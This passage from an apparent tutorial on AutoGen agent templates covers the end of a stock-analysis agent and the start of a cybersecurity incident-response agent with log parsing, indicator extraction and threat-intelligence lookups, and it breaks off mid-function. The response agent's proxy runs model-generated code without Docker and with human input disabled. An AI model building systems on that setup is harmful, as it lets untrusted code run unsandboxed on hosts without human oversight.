        # The manager uses an LLM to pick the next speaker, so it needs a config too
        manager = autogen.GroupChatManager(groupchat=groupchat, llm_config=self.llm_config)

        # Prepare market data for agents
        df = market_data[symbol]

        # Create price summary
        price_start = df['Close'].iloc[0]
        price_end = df['Close'].iloc[-1]
        price_change = price_end - price_start
        price_change_pct = (price_change / price_start) * 100
        price_high = df['High'].max()
        price_low = df['Low'].min()

        price_summary = f"""
        Stock: {symbol}
        Period: {period}
        Starting Price: ${price_start:.2f}
        Current Price: ${price_end:.2f}
        Price Change: ${price_change:.2f} ({price_change_pct:.2f}%)
        Period High: ${price_high:.2f}
        Period Low: ${price_low:.2f}
        Trading Volume (Avg): {df['Volume'].mean():.0f}
        """

        # Calculate key technical indicators
        tech_indicators = self.calculate_technical_indicators(
            symbol,
            ["ma20", "ma50", "ma200", "rsi", "macd", "bollinger"],
            period
        )

        # Convert indicators to string format
        indicators_str = json.dumps(tech_indicators, indent=2)

        # Get fundamental data if requested
        fundamentals_str = ""
        if include_fundamentals:
            fundamental_data = self.fetch_fundamental_data([symbol])
            if symbol in fundamental_data:
                # Extract key metrics
                info = fundamental_data[symbol].get("info", {})
                fundamentals_str = f"""
                Market Cap: {info.get('marketCap', 'N/A')}
                P/E Ratio: {info.get('trailingPE', 'N/A')}
                EPS: {info.get('trailingEps', 'N/A')}
                Beta: {info.get('beta', 'N/A')}
                52 Week High: {info.get('fiftyTwoWeekHigh', 'N/A')}
                52 Week Low: {info.get('fiftyTwoWeekLow', 'N/A')}
                Dividend Yield: {info.get('dividendYield', 'N/A')}
                Industry: {info.get('industry', 'N/A')}
                Sector: {info.get('sector', 'N/A')}
                """

        # Get news data if requested
        news_str = ""
        if include_news:
            news_data = self.fetch_news_data([symbol], days=15)
            if symbol in news_data and news_data[symbol]:
                news_str = "Recent News:\n"
                for i, article in enumerate(news_data[symbol][:5], 1):
                    news_str += f"""
                    {i}. {article.get('title', 'N/A')}
                    Source: {article.get('source', 'N/A')}
                    Date: {article.get('published_at', 'N/A')}
                    Summary: {article.get('description', 'N/A')}
                    """

        # Generate initial prompt for the agent team
        analysis_prompt = f"""
        Please analyze the following stock: {symbol}

        TIME PERIOD: {period}

        PRICE SUMMARY:
        {price_summary}

        TECHNICAL INDICATORS:
        {indicators_str}
        """

        if fundamentals_str:
            analysis_prompt += f"""
            FUNDAMENTAL DATA:
            {fundamentals_str}
            """

        if news_str:
            analysis_prompt += f"""
            NEWS:
            {news_str}
            """

        analysis_prompt += f"""
        Please provide a {report_type} analysis report that includes:
        1. Technical Analysis - Key patterns, indicators, and potential price targets
        2. Market Context - How the stock fits in the broader market environment
        {"3. Fundamental Analysis - Company financial health and valuation" if include_fundamentals else ""}
        {"4. News Sentiment Analysis - Impact of recent news" if include_news else ""}
        5. Investment Recommendation - Clear buy/hold/sell guidance with time horizon
        6. Risk Assessment - Key risks and considerations

        The MarketAnalyst should begin by providing market context.
        The TechnicalAnalyst should analyze price patterns and indicators.
        The FundamentalAnalyst should assess the company's financial health and valuation.
        The SentimentAnalyst should evaluate recent news and sentiment.
        The PortfolioAdvisor should synthesize these analyses into investment recommendations.
        Finally, the ReportWriter should compile a well-structured professional report.
        """

        # Start the group chat
        self.user_proxy.initiate_chat(
            manager,
            message=analysis_prompt
        )

        # Extract the final report from the shared group chat history,
        # where each message carries the name of the agent that sent it
        final_report = None
        for message in reversed(groupchat.messages):
            if message.get('name') == 'ReportWriter' and message.get('content'):
                final_report = message['content']
                break

        if not final_report:
            # Use the last substantial response from an analyst if no clear report
            for message in reversed(groupchat.messages):
                content = message.get('content') or ''
                if message.get('name') != self.user_proxy.name and len(content) > 500:
                    final_report = content
                    break

        return {
            "symbol": symbol,
            "analysis_date": datetime.datetime.now().strftime("%Y-%m-%d"),
            "period": period,
            "report_type": report_type,
            "price_data": {
                "current_price": price_end,
                "price_change": price_change,
                "price_change_pct": price_change_pct,
                "period_high": price_high,
                "period_low": price_low
            },
            "technical_indicators": tech_indicators,
            "report": final_report
        }

    def compare_stocks(
        self,
        symbols: List[str],
        period: str = "1y",
        report_type: str = "standard"
    ) -> Dict[str, Any]:
        """
        Compare multiple stocks and provide analysis.

        Args:
            symbols: List of stock symbols to compare
            period: Time period for analysis
            report_type: Type of report (standard, detailed, executive)

        Returns:
            Dictionary with comparative analysis
        """
        if len(symbols) < 2:
            return {"error": "Please provide at least two symbols for comparison"}

        # Gather data for all symbols
        market_data = self.fetch_market_data(symbols, period)

        # Create group chat for agent collaboration
        groupchat = autogen.GroupChat(
            agents=[
                self.user_proxy,
                self.market_analyst,
                self.technical_analyst,
                self.fundamental_analyst,
                self.portfolio_advisor,
                self.report_writer
            ],
            messages=[],
            max_round=12
        )

        # The manager uses an LLM to pick the next speaker, so it needs a config too
        manager = autogen.GroupChatManager(groupchat=groupchat, llm_config=self.llm_config)

        # Prepare comparative data
        comparison_data = {}
        price_performance = {}
        missing_data = []

        for symbol in symbols:
            if symbol in market_data and not market_data[symbol].empty:
                df = market_data[symbol]

                # Calculate performance metrics
                price_start = df['Close'].iloc[0]
                price_end = df['Close'].iloc[-1]
                price_change_pct = ((price_end / price_start) - 1) * 100

                # Calculate volatility (standard deviation of daily returns)
                volatility = df['Daily_Return'].std() * 100  # Multiply by 100 for percentage

                # Calculate max drawdown (largest drop from a running peak)
                rolling_max = df['Close'].cummax()
                drawdown = (df['Close'] / rolling_max - 1) * 100
                max_drawdown = drawdown.min()

                # Normalize price series (starting at 100)
                normalized_price = (df['Close'] / df['Close'].iloc[0]) * 100

                # Store metrics
                price_performance[symbol] = {
                    "price_change_pct": price_change_pct,
                    "current_price": price_end,
                    "volatility": volatility,
                    "max_drawdown": max_drawdown,
                    "normalized_prices": normalized_price.tolist()
                }

                # Calculate key technical indicators
                tech_indicators = self.calculate_technical_indicators(
                    symbol,
                    ["ma50", "rsi", "macd"],
                    period
                )

                # Add to comparison data
                comparison_data[symbol] = {
                    "performance": price_performance[symbol],
                    "technical_indicators": tech_indicators
                }
            else:
                missing_data.append(symbol)

        if not comparison_data:
            return {"error": "Could not fetch data for any of the provided symbols"}

        # Sort symbols by performance
        sorted_symbols = sorted(
            comparison_data.keys(),
            key=lambda x: comparison_data[x]["performance"]["price_change_pct"],
            reverse=True
        )

        # Create performance table
        performance_table = "Symbol | Price Change (%) | Volatility (%) | Max Drawdown (%)\n"
        performance_table += "-------|------------------|----------------|----------------\n"

        for symbol in sorted_symbols:
            perf = comparison_data[symbol]["performance"]
            performance_table += f"{symbol} | {perf['price_change_pct']:.2f}% | {perf['volatility']:.2f}% | {perf['max_drawdown']:.2f}%\n"

        # Create comparative prompt
        comparison_prompt = f"""
        Please perform a comparative analysis of the following stocks: {', '.join(symbols)}

        TIME PERIOD: {period}

        PERFORMANCE COMPARISON:
        {performance_table}

        TECHNICAL INDICATORS SUMMARY:
        """

        # Add technical indicators
        for symbol in sorted_symbols:
            tech = comparison_data[symbol]["technical_indicators"]
            comparison_prompt += f"\n{symbol} Indicators:\n"
            comparison_prompt += json.dumps(tech, indent=2) + "\n"

        if missing_data:
            comparison_prompt += f"\nNOTE: Could not fetch data for these symbols: {', '.join(missing_data)}\n"

        comparison_prompt += f"""
        Please provide a {report_type} comparative analysis report that includes:

        1. Performance Comparison - Compare the stocks' performance during the period
        2. Relative Strength Analysis - Which stocks show relative strength and weakness
        3. Correlation Analysis - How these stocks move in relation to each other
        4. Technical Position - Compare the technical position of each stock
        5. Ranked Recommendations - Rank the stocks from most to least favorable
        6. Portfolio Considerations - How these stocks might work together in a portfolio

        The MarketAnalyst should analyze the market context and relative performance.
        The TechnicalAnalyst should compare technical positions.
        The FundamentalAnalyst should provide comparative fundamental context if relevant.
        The PortfolioAdvisor should rank the stocks and provide portfolio recommendations.
        Finally, the ReportWriter should compile a well-structured comparative report.
        """

        # Start the group chat
        self.user_proxy.initiate_chat(
            manager,
            message=comparison_prompt
        )

        # Extract the final report from the shared group chat history,
        # where each message carries the name of the agent that sent it
        final_report = None
        for message in reversed(groupchat.messages):
            if message.get('name') == 'ReportWriter' and message.get('content'):
                final_report = message['content']
                break

        if not final_report:
            # Use the last substantial response from an analyst if no clear report
            for message in reversed(groupchat.messages):
                content = message.get('content') or ''
                if message.get('name') != self.user_proxy.name and len(content) > 500:
                    final_report = content
                    break

        return {
            "symbols": symbols,
            "analysis_date": datetime.datetime.now().strftime("%Y-%m-%d"),
            "period": period,
            "report_type": report_type,
            "performance_comparison": {symbol: comparison_data[symbol]["performance"] for symbol in comparison_data},
            "missing_data": missing_data,
            "report": final_report
        }

# Example usage
if __name__ == "__main__":
    # Create the financial analyst agent
    financial_analyst = FinancialAnalystAgent()

    # Analyze a single stock
    analysis = financial_analyst.analyze_stock(
        symbol="MSFT",
        period="1y",
        include_news=True,
        report_type="standard"
    )

    print("=== Single Stock Analysis ===")
    print(f"Symbol: {analysis['symbol']}")
    print(f"Current Price: ${analysis['price_data']['current_price']:.2f}")
    print(f"Price Change: {analysis['price_data']['price_change_pct']:.2f}%")
    print("\nReport Excerpt:")
    # Guard against a missing report before slicing
    print((analysis['report'] or "")[:500] + "...\n")

    # Compare multiple stocks
    comparison = financial_analyst.compare_stocks(
        symbols=["AAPL", "MSFT", "GOOGL"],
        period="6mo",
        report_type="standard"
    )

    print("=== Stock Comparison ===")
    if "error" in comparison:
        # compare_stocks returns {"error": ...} when no symbol data could be fetched
        print(f"Comparison failed: {comparison['error']}")
    else:
        print(f"Symbols: {comparison['symbols']}")
        print("\nPerformance Comparison:")
        for symbol, perf in comparison['performance_comparison'].items():
            print(f"{symbol}: {perf['price_change_pct']:.2f}%")

        print("\nReport Excerpt:")
        print((comparison['report'] or "")[:500] + "...")

Usage Example:

python
from financial_analyst_agent import FinancialAnalystAgent

# Initialize agent
analyst = FinancialAnalystAgent()

# Analyze a stock
report = analyst.analyze_stock(
    symbol="TSLA",
    period="1y",
    include_news=True,
    include_fundamentals=True,
    report_type="detailed"
)

print(f"Analysis of {report['symbol']} completed.")
print(f"Current price: ${report['price_data']['current_price']:.2f}")
print(f"Price change: {report['price_data']['price_change_pct']:.2f}%")
print("\nReport Highlights:")
print(report['report'])

# Compare multiple stocks
comparison = analyst.compare_stocks(
    symbols=["AAPL", "MSFT", "GOOGL", "AMZN", "META"],
    period="6mo",
    report_type="standard"
)

print("\nComparative Analysis:")
print(comparison['report'])
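
One caveat when consuming these results: `compare_stocks` returns a dictionary with an `error` key when no symbol data could be fetched, and its `report` field stays `None` if no agent message qualifies as the final report. The sketch below shows one way a caller might guard against both cases before printing. The helper name `report_excerpt` and its `limit` parameter are hypothetical and not part of the template.

```python
from typing import Any, Dict


def report_excerpt(result: Dict[str, Any], limit: int = 500) -> str:
    """Return a printable excerpt from an analysis result.

    Hypothetical helper: handles the {"error": ...} shape and a missing report.
    """
    if "error" in result:
        return f"Analysis failed: {result['error']}"
    report = result.get("report") or ""
    if not report:
        return "No report was produced."
    # Truncate long reports and mark the cut with an ellipsis
    return report if len(report) <= limit else report[:limit] + "..."


print(report_excerpt({"error": "Could not fetch data for any of the provided symbols"}))
print(report_excerpt({"symbols": ["AAPL"], "report": None}))
```

Keeping this logic in one place avoids repeating the same checks at every call site.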

This AI Financial Analyst agent template demonstrates key enterprise patterns:

  1. Agent Specialization: Different agents focus on specific analysis types (technical, fundamental, news)
  2. Data Pipeline Integration: The system integrates multiple external data sources
  3. Collaborative Analysis: Agents work together via a group chat to produce a comprehensive analysis
  4. Flexible Report Generation: Different report types for various user needs
  5. Caching Strategy: Data caching to improve performance and reduce redundant API calls
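
To make the caching pattern concrete, here is a minimal sketch of a time-to-live cache that wraps an expensive data fetch. It illustrates the general idea only and is not the template's own cache. The class name `TTLCache`, the 300-second default, and the `fake_price_fetch` stand-in are all assumptions made for this example.

```python
import time
from typing import Any, Callable, Dict, Hashable, Tuple


class TTLCache:
    """Tiny in-memory cache whose entries expire after ttl_seconds."""

    def __init__(self, ttl_seconds: float = 300.0,
                 clock: Callable[[], float] = time.monotonic):
        self.ttl_seconds = ttl_seconds
        self._clock = clock  # injectable so expiry can be tested without sleeping
        self._store: Dict[Hashable, Tuple[float, Any]] = {}

    def get_or_fetch(self, key: Hashable, fetch: Callable[[], Any]) -> Any:
        """Return the cached value for key, calling fetch() only on a miss or expiry."""
        now = self._clock()
        entry = self._store.get(key)
        if entry is not None and now - entry[0] < self.ttl_seconds:
            return entry[1]
        value = fetch()
        self._store[key] = (now, value)
        return value


calls = []


def fake_price_fetch() -> dict:
    # Stand-in for an external market-data request
    calls.append(1)
    return {"symbol": "MSFT", "period": "1y"}


cache = TTLCache(ttl_seconds=300)
cache.get_or_fetch(("MSFT", "1y"), fake_price_fetch)
cache.get_or_fetch(("MSFT", "1y"), fake_price_fetch)
print(f"fetches performed: {len(calls)}")
```

Keying on the `(symbol, period)` pair means repeated analyses of the same stock and window reuse one upstream request until the entry expires.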

AI-Powered Cybersecurity Incident Response (Threat Detection & Remediation)

This AI agent template helps cybersecurity teams detect, analyze, and respond to security incidents. It combines threat intelligence, log analysis, and remediation guidance in a single incident response workflow.

Core Capabilities:

  • Automated log analysis and threat detection
  • Incident classification and severity assessment
  • Threat intelligence correlation
  • Forensic investigation support
  • Guided remediation steps
  • Documentation generation for compliance
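
To illustrate the severity assessment capability, the sketch below reproduces the scoring scheme used by the implementation in this section. It has three capped factors: high-confidence techniques (up to 40 points), malicious indicators (up to 30), and tactics (up to 30). The resulting score maps to a label at thresholds of 80, 60, 40, and 20. The standalone function names are assumptions for this example; in the template the logic lives in a single method.

```python
def severity_level(score: int) -> str:
    """Map a 0-100 severity score to a label using the template's thresholds."""
    thresholds = [(80, "Critical"), (60, "High"), (40, "Medium"), (20, "Low")]
    for minimum, label in thresholds:
        if score >= minimum:
            return label
    return "Informational"


def severity_score(high_confidence_techniques: int,
                   malicious_indicators: int,
                   tactic_points: int) -> int:
    """Combine the three capped factors: techniques (40), indicators (30), tactics (30)."""
    return (
        min(high_confidence_techniques * 10, 40)
        + min(malicious_indicators * 5, 30)
        + min(tactic_points, 30)
    )


score = severity_score(high_confidence_techniques=3, malicious_indicators=4, tactic_points=11)
print(score, severity_level(score))
```

Capping each factor keeps any single signal, such as a long list of flagged IPs, from pushing an incident to Critical on its own.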

Architecture:

Cybersecurity Incident Response Agent Architecture

Implementation Example:

python
1# cybersecurity_incident_response_agent.py
2import os
3import json
4import datetime
5import ipaddress
6import hashlib
7import re
8import uuid
9import pandas as pd
10import numpy as np
11import autogen
12import requests
13from typing import Dict, List, Any, Optional, Union, Tuple
14
15# Configure API keys and settings
16OPENAI_API_KEY = os.environ.get("OPENAI_API_KEY", "your-api-key")
17VIRUSTOTAL_API_KEY = os.environ.get("VIRUSTOTAL_API_KEY", "your-api-key")
18ABUSEIPDB_API_KEY = os.environ.get("ABUSEIPDB_API_KEY", "your-api-key")
19
20# Initialize OpenAI client
21import openai
22client = openai.OpenAI(api_key=OPENAI_API_KEY)
23
24class CybersecurityIncidentResponseAgent:
25 """
26 An AI-powered cybersecurity incident response agent that helps detect,
27 analyze, and respond to security incidents.
28 """
29
30 def __init__(self, config=None):
31 """
32 Initialize the Cybersecurity Incident Response Agent.
33
34 Args:
35 config: Optional configuration dictionary
36 """
37 self.config = config or {}
38
39 # Set up agent configuration
40 self.llm_config = {
41 "config_list": [{"model": "gpt-4-turbo", "api_key": OPENAI_API_KEY}],
42 "temperature": 0.2,
43 "timeout": 120
44 }
45
46 # Create the agent team
47 self._create_agent_team()
48
49 # Threat intelligence cache
50 self.threat_intel_cache = {}
51
52 def _create_agent_team(self):
53 """Create the team of specialized agents for cybersecurity incident response."""
54
55 # 1. Threat Detector - Specialized in identifying threats from logs and data
56 self.threat_detector = autogen.AssistantAgent(
57 name="ThreatDetector",
58 system_message="""You are an expert threat detection analyst who specializes in identifying security threats
59 from logs, network traffic, and system data.
60
61 Your responsibilities:
62 1. Analyze raw logs and identify suspicious patterns or anomalies
63 2. Recognize indicators of compromise (IoCs) such as unusual IP addresses, file hashes, or user behaviors
64 3. Detect potential attack techniques and map them to the MITRE ATT&CK framework
65 4. Identify false positives and prioritize genuine security concerns
66 5. Alert on critical security issues with appropriate context
67
68 Be thorough and methodical in your analysis. Look for subtle patterns that might indicate sophisticated
69 attacks. Avoid jumping to conclusions without sufficient evidence. Always provide specific indicators
70 and explain why they are suspicious.""",
71 llm_config=self.llm_config
72 )
73
74 # 2. Forensic Investigator - Specialized in detailed investigation
75 self.forensic_investigator = autogen.AssistantAgent(
76 name="ForensicInvestigator",
77 system_message="""You are an expert digital forensic investigator who specializes in analyzing security
78 incidents to determine their scope, impact, and attribution.
79
80 Your responsibilities:
81 1. Analyze evidence thoroughly to reconstruct the incident timeline
82 2. Identify the attack vectors and methods used by threat actors
83 3. Determine the scope of compromise (affected systems, data, users)
84 4. Look for persistence mechanisms and backdoors
85 5. Gather indicators that can help with attribution
86
87 Be methodical and detail-oriented in your investigation. Document your findings clearly, including timestamps
88 and specific technical details. Distinguish between confirmed facts, strong evidence, and speculation.
89 Consider alternative explanations and test your hypotheses against the evidence.""",
90 llm_config=self.llm_config
91 )
92
93 # 3. Threat Intelligence Analyst - Specialized in external threat intelligence
94 self.threat_intel_analyst = autogen.AssistantAgent(
95 name="ThreatIntelAnalyst",
96 system_message="""You are an expert threat intelligence analyst who specializes in researching and
97 analyzing cyber threats, threat actors, and their tactics, techniques, and procedures (TTPs).
98
99 Your responsibilities:
100 1. Research indicators of compromise against threat intelligence sources
101 2. Identify known threat actors or malware associated with the incident
102 3. Provide context on the tactics, techniques, and procedures used
103 4. Assess the potential goals and motivation of the attackers
104 5. Determine if the attack is targeted or opportunistic
105
106 Provide relevant, actionable intelligence that helps understand the threat. Link findings to the
107 MITRE ATT&CK framework when possible. Distinguish between high and low-confidence assessments.
108 Consider the reliability of intelligence sources. Focus on information that is directly relevant
109 to the current incident.""",
110 llm_config=self.llm_config
111 )
112
113 # 4. Incident Responder - Specialized in containment and remediation
114 self.incident_responder = autogen.AssistantAgent(
115 name="IncidentResponder",
116 system_message="""You are an expert incident responder who specializes in containing security incidents,
117 removing threats, and restoring systems to normal operation.
118
119 Your responsibilities:
120 1. Provide immediate containment actions to limit the impact of the incident
121 2. Develop detailed remediation plans to remove the threat
122 3. Recommend recovery steps to restore affected systems
123 4. Suggest security improvements to prevent similar incidents
124 5. Prioritize actions based on risk and business impact
125
126 Your recommendations should be specific, actionable, and prioritized. Consider the potential impact
127 of response actions on business operations. Provide both immediate tactical responses and strategic
128 improvements. Always consider the order of operations to avoid alerting attackers or destroying evidence.
129 Tailor your response to the specific environment and incident details.""",
130 llm_config=self.llm_config
131 )
132
133 # 5. Documentation Specialist - Specialized in creating comprehensive incident documentation
134 self.documentation_specialist = autogen.AssistantAgent(
135 name="DocumentationSpecialist",
136 system_message="""You are an expert in creating comprehensive cybersecurity incident documentation
137 that is clear, thorough, and suitable for multiple audiences including technical teams, management,
138 and compliance requirements.
139
140 Your responsibilities:
141 1. Compile incident details into structured documentation
142 2. Create executive summaries for management and technical details for IT teams
143 3. Ensure documentation satisfies compliance and regulatory requirements
144 4. Include all relevant timeline information, affected systems, and remediation steps
145 5. Document lessons learned and recommended improvements
146
147 Create documentation that is well-organized, precise, and actionable. Use clear sections with
148 appropriate headers. Include all relevant technical details while making executive summaries
149 accessible to non-technical audiences. Ensure all claims are supported by evidence. Include
150 metadata such as incident IDs, dates, and classification.""",
151 llm_config=self.llm_config
152 )
153
154 # User proxy agent for orchestrating the workflow
155 self.user_proxy = autogen.UserProxyAgent(
156 name="SecurityAnalyst",
157 human_input_mode="NEVER",
158 code_execution_config={
159 "work_dir": "security_workspace",
160 "use_docker": False
161 },
162 system_message="""You are a security analyst coordinating the incident response process.
163 Your role is to gather data, distribute it to the specialized analysts, and compile their insights.
164 You can execute Python code to analyze security data and fetch threat intelligence."""
165 )
166
    def _hash_file(self, file_path: str) -> Optional[str]:
        """
        Compute SHA-256 hash of a file.

        Args:
            file_path: Path to the file

        Returns:
            SHA-256 hash as a hexadecimal string, or None if the file cannot be read
        """
        try:
            sha256_hash = hashlib.sha256()
            with open(file_path, "rb") as f:
                # Read in 4 KB blocks so large files are not loaded into memory at once
                for byte_block in iter(lambda: f.read(4096), b""):
                    sha256_hash.update(byte_block)
            return sha256_hash.hexdigest()
        except OSError as e:
            print(f"Error hashing file {file_path}: {e}")
            return None
186
    def parse_log_data(self, log_data: str, log_type: str = "generic") -> List[Dict[str, Any]]:
        """
        Parse raw log data into structured format based on log type.

        Args:
            log_data: Raw log data as string
            log_type: Type of log: "windows_event", "syslog", "apache", "nginx",
                or "firewall"; any other value falls back to generic best-effort parsing

        Returns:
            List of dictionaries containing structured log entries
        """
198 structured_logs = []
199
200 # Split log data into lines
201 log_lines = log_data.strip().split('\n')
202
203 if log_type.lower() == "windows_event":
204 # Parse Windows Event logs
205 current_event = {}
206 for line in log_lines:
207 line = line.strip()
208 if line.startswith("Log Name:"):
209 if current_event:
210 structured_logs.append(current_event)
211 current_event = {"Log Name": line.split("Log Name:")[1].strip()}
212 elif ":" in line and current_event:
213 key, value = line.split(":", 1)
214 current_event[key.strip()] = value.strip()
215
216 # Add the last event
217 if current_event:
218 structured_logs.append(current_event)
219
220 elif log_type.lower() == "syslog":
221 # Parse syslog format
222 for line in log_lines:
223 if not line.strip():
224 continue
225
226 try:
227 # Basic syslog pattern: <timestamp> <hostname> <process>[<pid>]: <message>
228 match = re.match(r"(\w+\s+\d+\s+\d+:\d+:\d+)\s+(\S+)\s+([^:]+):\s+(.*)", line)
229 if match:
230 timestamp, hostname, process, message = match.groups()
231 # Extract PID if present
232 pid_match = re.search(r"\[(\d+)\]", process)
233 pid = pid_match.group(1) if pid_match else None
234 process = re.sub(r"\[\d+\]", "", process).strip()
235
236 structured_logs.append({
237 "timestamp": timestamp,
238 "hostname": hostname,
239 "process": process,
240 "pid": pid,
241 "message": message,
242 "raw_log": line
243 })
244 else:
245 # If pattern doesn't match, store as raw log
246 structured_logs.append({"raw_log": line})
247 except Exception as e:
248 structured_logs.append({"raw_log": line, "parse_error": str(e)})
249
250 elif log_type.lower() == "apache" or log_type.lower() == "nginx":
251 # Parse common web server log format
252 for line in log_lines:
253 if not line.strip():
254 continue
255
256 try:
257 # Common Log Format: <ip> <identity> <user> [<time>] "<request>" <status> <size>
258 # Combined Log Format: adds "<referrer>" "<user_agent>"
259 pattern = r'(\S+) (\S+) (\S+) \[(.*?)\] "([^"]*)" (\d+) (\S+)(?: "([^"]*)" "([^"]*)")?'
260 match = re.match(pattern, line)
261
                    if match:
                        groups = match.groups()
                        log_entry = {
                            "ip": groups[0],
                            "identity": groups[1],
                            "user": groups[2],
                            "time": groups[3],
                            "request": groups[4],
                            "status": groups[5],
                            "size": groups[6],
                            "raw_log": line
                        }

                        # Add referrer and user_agent if available (Combined Log Format).
                        # match.groups() always has nine items; unmatched optional groups are None.
                        if groups[7] is not None:
                            log_entry["referrer"] = groups[7]
                        if groups[8] is not None:
                            log_entry["user_agent"] = groups[8]

                        structured_logs.append(log_entry)
                    else:
                        structured_logs.append({"raw_log": line})
284 except Exception as e:
285 structured_logs.append({"raw_log": line, "parse_error": str(e)})
286
287 elif log_type.lower() == "firewall":
288 # Parse basic firewall log format
289 for line in log_lines:
290 if not line.strip():
291 continue
292
293 try:
294 # Extract key-value pairs from firewall logs
295 # Example: timestamp=2023-04-12T12:34:56 action=BLOCK src=192.168.1.2 dst=10.0.0.1 proto=TCP
296 log_entry = {"raw_log": line}
297
298 # Extract key-value pairs
299 kvp_pattern = r'(\w+)=([^ ]+)'
300 for k, v in re.findall(kvp_pattern, line):
301 log_entry[k] = v
302
303 structured_logs.append(log_entry)
304 except Exception as e:
305 structured_logs.append({"raw_log": line, "parse_error": str(e)})
306
307 else:
308 # Generic log parsing - best effort
309 for line in log_lines:
310 if not line.strip():
311 continue
312
313 log_entry = {"raw_log": line}
314
315 # Try to extract timestamp
316 timestamp_pattern = r'\b\d{4}-\d{2}-\d{2}[T ]\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:\d{2})?\b'
317 timestamp_match = re.search(timestamp_pattern, line)
318 if timestamp_match:
319 log_entry["timestamp"] = timestamp_match.group(0)
320
321 # Try to extract IP addresses
322 ip_pattern = r'\b(?:\d{1,3}\.){3}\d{1,3}\b'
323 ip_addresses = re.findall(ip_pattern, line)
324 if ip_addresses:
325 log_entry["ip_addresses"] = ip_addresses
326
327 # Try to extract severity levels
328 severity_pattern = r'\b(ERROR|WARN(?:ING)?|INFO|DEBUG|CRITICAL|ALERT|EMERGENCY)\b'
329 severity_match = re.search(severity_pattern, line, re.IGNORECASE)
330 if severity_match:
331 log_entry["severity"] = severity_match.group(0)
332
333 structured_logs.append(log_entry)
334
335 return structured_logs
336
    def extract_indicators(self, logs: List[Dict[str, Any]]) -> Dict[str, List[str]]:
        """
        Extract potential indicators of compromise from logs.

        Args:
            logs: Parsed log data

        Returns:
            Dictionary of indicators by type (ips, domains, urls, hashes, usernames, filenames)
        """
        indicators = {
            "ips": set(),
            "domains": set(),
            "urls": set(),
            "hashes": set(),
            "usernames": set(),
            "filenames": set()
        }

        # Constants shared by every log entry
        common_domains = ["google.com", "microsoft.com", "apple.com", "amazon.com"]
        malicious_extensions = [".exe", ".dll", ".ps1", ".vbs", ".bat", ".sh", ".js", ".hta"]

        for log in logs:
            raw_log = log.get("raw_log", "")

            # Extract IPs from the raw line and from specific fields like src, dst, source_ip, etc.
            ip_pattern = r'\b(?:\d{1,3}\.){3}\d{1,3}\b'
            found_ips = re.findall(ip_pattern, raw_log)

            for ip_field in ["ip", "src", "dst", "source_ip", "destination_ip", "client_ip"]:
                if ip_field in log and log[ip_field]:
                    found_ips.append(log[ip_field])

            for ip in found_ips:
                try:
                    # ip_address() raises ValueError for malformed values such as 999.1.1.1
                    ip_obj = ipaddress.ip_address(ip)
                except ValueError:
                    continue
                # Skip private, loopback, and multicast addresses
                if not (ip_obj.is_private or ip_obj.is_loopback or ip_obj.is_multicast):
                    indicators["ips"].add(ip)

            # Extract domains
            domain_pattern = r'\b(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}\b'
            found_domains = re.findall(domain_pattern, raw_log)

            for domain in found_domains:
                # Skip common benign domains and their subdomains. Matching on ".google.com"
                # rather than "google.com" keeps look-alikes such as "evilgoogle.com".
                name = domain.lower()
                if not any(name == d or name.endswith("." + d) for d in common_domains):
                    indicators["domains"].add(domain)

            # Extract URLs
            url_pattern = r'https?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
            found_urls = re.findall(url_pattern, raw_log)
            indicators["urls"].update(found_urls)

            # Extract file hashes (MD5, SHA1, SHA256)
            md5_pattern = r'\b[a-fA-F0-9]{32}\b'
            sha1_pattern = r'\b[a-fA-F0-9]{40}\b'
            sha256_pattern = r'\b[a-fA-F0-9]{64}\b'

            indicators["hashes"].update(re.findall(md5_pattern, raw_log))
            indicators["hashes"].update(re.findall(sha1_pattern, raw_log))
            indicators["hashes"].update(re.findall(sha256_pattern, raw_log))

            # Extract usernames - depends on log format
            # This is a simple extraction for common formats, would need to be customized
            if "user" in log and log["user"] and log["user"] != "-":
                indicators["usernames"].add(log["user"])

            # Look for username patterns in raw log
            username_pattern = r'user[=:]([^\s;]+)'
            username_matches = re.findall(username_pattern, raw_log, re.IGNORECASE)
            indicators["usernames"].update(username_matches)

            # Extract filenames with potentially malicious extensions.
            # The group is non-capturing so findall() returns the whole filename
            # instead of only the last ".ext" fragment.
            filename_pattern = r'\b[\w-]+(?:\.[\w-]+)+\b'
            found_filenames = re.findall(filename_pattern, raw_log)

            for filename in found_filenames:
                _, ext = os.path.splitext(filename)
                if ext.lower() in malicious_extensions:
                    indicators["filenames"].add(filename)

        # Convert sets to lists for JSON serialization
        return {k: list(v) for k, v in indicators.items()}
425
426 def check_indicator_reputation(self, indicator: str, indicator_type: str) -> Dict[str, Any]:
427 """
428 Check the reputation of an indicator using threat intelligence services.
429
430 Args:
431 indicator: The indicator value
432 indicator_type: Type of indicator (ip, domain, hash, url)
433
434 Returns:
435 Dictionary with reputation data
436 """
437 # Check cache first
438 cache_key = f"{indicator_type}:{indicator}"
439 if cache_key in self.threat_intel_cache:
440 return self.threat_intel_cache[cache_key]
441
442 reputation_data = {
443 "indicator": indicator,
444 "type": indicator_type,
445 "malicious": False,
446 "reputation_score": 0,
447 "tags": [],
448 "source": "Unknown",
449 "last_seen": None
450 }
451
452 try:
            if indicator_type == "ip":
                # Check IP reputation using AbuseIPDB
                url = "https://api.abuseipdb.com/api/v2/check"
                headers = {
                    "Accept": "application/json",
                    "Key": ABUSEIPDB_API_KEY
                }
                params = {
                    "ipAddress": indicator,
                    "maxAgeInDays": 90,
                    "verbose": True
                }

                # A timeout keeps one slow lookup from stalling the whole analysis
                response = requests.get(url, headers=headers, params=params, timeout=10)
                if response.status_code == 200:
                    data = response.json().get("data", {})
                    abuse_score = data.get("abuseConfidenceScore", 0)
                    domain = data.get("domain", "")
                    # usageType can be null in the response, so fall back to an empty string
                    usage_type = data.get("usageType") or ""

                    reputation_data.update({
                        "malicious": abuse_score > 50,
                        "reputation_score": abuse_score,
                        "tags": [tag.strip() for tag in usage_type.split(",") if tag.strip()],
                        "source": "AbuseIPDB",
                        "domain": domain,
                        "country": data.get("countryCode", ""),
                        "reports": data.get("totalReports", 0),
                        "last_seen": data.get("lastReportedAt", None)
                    })
482
483 elif indicator_type in ["hash", "file_hash"]:
                # Check file hash reputation using VirusTotal
                url = f"https://www.virustotal.com/api/v3/files/{indicator}"
                headers = {
